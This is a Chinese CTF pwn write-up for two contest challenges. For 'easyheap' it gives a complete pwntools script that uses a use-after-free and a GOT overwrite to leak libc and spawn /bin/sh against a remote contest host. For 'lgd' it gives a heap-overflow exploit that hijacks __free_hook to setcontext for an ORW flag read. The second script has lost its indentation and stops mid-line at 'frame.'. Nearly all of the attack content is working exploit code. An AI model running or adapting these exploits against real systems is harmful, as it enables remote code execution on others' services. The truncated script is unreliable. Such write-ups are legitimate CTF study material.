高校战“疫”网络安全分享赛pwn部分wp
easyheap
刚复现的第一题,并且在刚开始的时候连洞都找不到…可真是当头一棒。
漏洞在于申请的大小大于 0x400 时直接 return，这时 ptr[i] 没有被释放；接下来就是常规操作：劫持 ptr[i] 堆块上的指针为 GOT 表，修改 GOT 表来实现利用。
```python
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
# pwntools settings: verbose I/O tracing, and a 64-bit word size for p64()/u64().
context.update(log_level='debug', arch='amd64')

# Connection handle (process or remote tube); pwn() rebinds it via `global p`.
p = 0
def pwn(ip,port,debug,flaag):
    """Replay the easyheap exploitation sequence described in the writeup above.

    Two properties of the target make the sequence work, and both are what a
    fix would remove: the slot of a freed message keeps pointing at the freed
    chunk (every later edit(0, ...) is a use-after-free write), and the GOT is
    writable at run time (presumably Partial RELRO), so one library pointer can
    be swapped for another.  Full RELRO would make the GOT writes below fault,
    and PIE would invalidate the fixed 0x6020xx addresses used here.

    Args:
        ip: host of the remote instance (ignored when debug == 1).
        port: port of the remote instance (ignored when debug == 1).
        debug: 1 runs `flaag` locally under process(); any other value
            connects to ip:port with remote().
        flaag: path of the target ELF; only used for GOT/PLT lookups.

    Side effects: rebinds the module-level tube `p`, talks to the service,
    prints two addresses (Python 2 print statements) and ends in
    p.interactive().  Nothing is returned.
    """
    elf = ELF(flaag)
    global p
    if(debug == 1):
        p = process(flaag)
    else:
        p = remote(ip,port)

    # Menu wrappers.  Every prompt is matched byte-for-byte, so a changed
    # banner or a different menu order desynchronises the whole session.
    def add(size,content):
        # Option 1: allocate `size` bytes and fill them with `content`.
        p.sendlineafter("Your choice:\n","1")
        p.sendlineafter("this message?\n",str(size))
        p.sendafter("content of the message?\n",content)
    def free(index):
        # Option 2: release slot `index`.
        p.sendlineafter("Your choice:\n","2")
        p.sendlineafter("item to be deleted?\n",str(index))
    def edit(index,content):
        # Option 3: overwrite slot `index` with `content`.
        p.sendlineafter("Your choice:\n","3")
        p.sendlineafter(" the item to be modified?\n",str(index))
        p.sendafter("content of the message?\n",content)

    # Symbol offsets come from the local libc, so the result is only valid
    # when the service runs this exact libc build (LibcSearcher is imported
    # at file level but never used here).
    libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

    # Slot 0 is freed but stays addressable: the writeup's dangling ptr[i].
    add(0x18,'\xff'*0x18)
    free(0)
    # Two requests above the 0x400 limit.  The writeup says this path returns
    # early; no content prompt follows, which is why add() is not used here.
    # Presumably these still consume slots 1 and 2 — not verifiable from here.
    p.sendlineafter("Your choice:\n","1")
    p.sendlineafter("this message?\n",str(0x500))
    p.sendlineafter("Your choice:\n","1")
    p.sendlineafter("this message?\n",str(0x500))

    # UAF write into the freed chunk 0.  The third qword is the address that
    # edit(1)/free(1) dereference afterwards (inferred: each later edit(1)
    # lands wherever this qword points).  0x6020d8 is a fixed address, so the
    # binary is presumably built without PIE.
    edit(0,p64(0)+p64(0x21)+p64(0x6020d8))
    # Writes a small pointer table at 0x6020d8: a few fixed .bss addresses,
    # the address of free's GOT entry, a length-looking value, and "/bin/sh".
    # Slots 3 and 4 used at the end appear to be read from this table —
    # confirm against the binary's layout.
    edit(1,p64(0x6020f0)+p64(0x602100)+p64(0)+p64(elf.got['free'])+p64(0x200)+p64(0x602108)+'/bin/sh\x00')
    #gdb.attach(p)
    # GOT overwrite: aim slot 1 at free's GOT entry and replace it with
    # puts@plt, so any free(x) now behaves as puts(ptr[x]).  This is the step
    # that Full RELRO (read-only GOT after relocation) prevents.
    edit(0,p64(0)+p64(0x21)+p64(elf.got['free']))
    edit(1,p64(elf.plt['puts']))
    # Aim slot 1 at puts' GOT entry; free(1) therefore prints the resolved
    # address of puts — the libc leak.
    edit(0,p64(0)+p64(0x21)+p64(elf.got['puts']))
    free(1)
    # A canonical x86-64 user-space address fits in 6 bytes; the read is
    # assumed not to come back short.
    puts_addr=u64(p.recv(6).ljust(8,'\x00'))
    libcbase_addr=puts_addr-libc.symbols['puts']
    system_addr=libcbase_addr+libc.symbols['system']
    # Python 2 iterator protocol (.next()); Python 3 would need next(...).
    binsh_addr=libcbase_addr+libc.search("/bin/sh\x00").next()
    # Slot 3 presumably aliases free's GOT entry (table above) and slot 4 the
    # "/bin/sh" string, so free(4) ends up as system("/bin/sh").  binsh_addr
    # is computed but never used.
    edit(3,p64(system_addr))
    free(4)
    # Python 2 print statements; the file is Python 2 throughout.
    print "system_addr=>",hex(system_addr)
    print "libcbase_addr=>",hex(libcbase_addr)
    p.interactive()
if __name__ == '__main__':
    # Contest instance from the writeup; debug=0 selects remote() over a local process().
    pwn(ip='121.36.209.145', port=9997, debug=0, flaag='./easyheap')
lgd
开沙盒的堆溢出,老实说之前没遇到过这种。
在 edit 时 read 的长度为 add 时写在 bss 段的字符串长度，造成了堆溢出。利用堆溢出劫持 __free_hook 为 setcontext，从而控制 rsp、rip，进而劫持程序执行流，再利用 ORW 来泄露 flag。
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
# pwntools settings: verbose I/O tracing, and a 64-bit word size for p64()/u64().
context.update(log_level='debug', arch='amd64')

# Connection handle (process or remote tube); pwn() rebinds it via `global p`.
p = 0
def pwn(ip,port,debug,flaag):
elf = ELF(flaag)
global p
if(debug == 1):
p = process(flaag)
else:
p = remote(ip,port)
def add(size,content):
p.sendlineafter(">> ","1")
p.sendlineafter("______?\n",str(size))
p.sendafter("yes_or_no?\n",content)
def free(index):
p.sendlineafter(">> ","2")
p.sendlineafter("index ?\n",str(index))
def show(index):
p.sendlineafter(">> ","3")
p.sendlineafter("index ?\n",str(index))
def edit(index,content):
p.sendlineafter(">> ","4")
p.sendlineafter("index ?\n",str(index))
p.sendafter("c___new_content ?\n",content)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
p.sendlineafter("what is your name? \n","aaa")
add(0x50,"\xff"*0x200)
add(0xf8,'\xff'*0x200)
add(0x68,"\xff"*0x200)
free(1)
free(2)
edit(0,"A"*0x58+"B"*8)
show(0)
p.recvuntil("BBBBBBBB")
main_arena=u64(p.recv(6).ljust(8,"\x00"))
libcbase_addr=main_arena-(0x7f9f177d8b78-0x7f9f17414000)
free_hook=libcbase_addr+libc.symbols['__free_hook']
edit(0,"A"*0x58+p64(0x101)+p64(main_arena)+p64(free_hook-0x40)+p64(0)*28+p64(0x100)+p64(0x71)+p64(free_hook-0x33))
add(0xf8,'\xff'*0x200)
add(0x68,'\xff'*0x200)
add(0x68,'\xff'*0x200)
edit(3,p64(0)*4+'\x00'*3+p64(libcbase_addr+libc.symbols['setcontext']+0x35))
frame = SigreturnFrame()
frame.rdi = 0
frame.rax = 0
frame.